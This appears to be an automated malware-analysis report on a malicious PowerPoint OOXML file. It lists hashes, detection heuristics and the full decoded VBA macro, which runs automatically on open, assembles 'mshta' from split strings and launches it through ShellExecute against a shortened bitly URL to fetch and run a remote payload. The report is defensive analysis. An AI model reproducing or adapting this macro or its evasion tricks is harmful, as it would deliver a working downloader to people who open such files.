Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2d7d584547eaab96…

MALICIOUS

Office (OOXML)

10.6 KB First seen: 2021-06-13
MD5: 1bc7ed3392671d40341411d849f3b9b9 SHA-1: d98b7b14cf2a1562a59672db1a12a256d3de4294 SHA-256: 2d7d584547eaab960cfc264d392ff5f9e08787f6586488a5ff9d5b9ff3281b30
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. The Auto_Open macro is designed to execute a second-stage payload. It reconstructs the command 'mshta' and a URL 'https://www.bitly.com/asiajiaiwn' to download and execute a payload. The GetObject call with obfuscated string literals suggests an attempt to establish persistence.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/aw.bin)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    . _
ShellExecute@ _
NamakBora _
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    = _
GetObject _
(StrReverse _
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub _
AutO_opEn _
()
  • VBA project is signed but not by a recognised publisher info VBA_SIGNED_UNTRUSTED
    The VBA project carries a digital signature, but the signer does not chain to a recognised code-signing publisher/CA (self-signed, unknown issuer, or unparseable). A signature alone is not evidence of benignity — malware is routinely self-signed or signed with stolen certificates.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/asiajiaiwn In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1270 bytes
SHA-256: 448d925440af421c776aed9e78dbc2f262d9d9bdbf6bfa495a32211b589ae697
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub _
AutO_opEn _
()

Dim _
bora _
As _
New _
Class1

Dim _
NamakBora _
, _
lora _
As _
String
NamakBora _
= _
bora _
. _
getEnumName _
(1)
lora _
= _
bora _
. _
getEnumName _
(2)
lora2 _
= _
bora _
. _
getEnumName _
(2)


bora _
. _
myvalue _
. _
ShellExecute@ _
NamakBora _
, _
lora2

End _
Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum

    myname1 = 1
    myname2 = 2
    myname3 = 3
    myname4 = 4
    
    End Enum
    
Public _
Function _
getEnumName _
(eValue As myenum)
Select _
Case _
eValue
    Case _
    1
        getEnumName _
        = _
        "m" + "s" + "h" + "t" + "a"
    Case _
    2
        getEnumName _
        = _
        "https://www.bitly.com/asiajiaiwn"
    End _
    Select
End _
Function


Public _
Function _
myvalue _
()
Set _
myvalue _
= _
GetObject _
(StrReverse _
("000045355444-E94A-EC11-972C-02690731:wen") _
)
End _
Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/aw.bin 19968 bytes
SHA-256: f853232e8123f41bbb1b224c72efb20353a8d41a66533d6b520cd98c5a655862
vbaProject_01.bin vba-project OOXML VBA project: ppt/vbaProjectSignature.bin 1928 bytes
SHA-256: b0d44d5f5c9a29714228d958ca3ae1502239c72bbcc32beb43afca801a1a60e0

Open this report in the interactive analyzer, or submit your own file for analysis.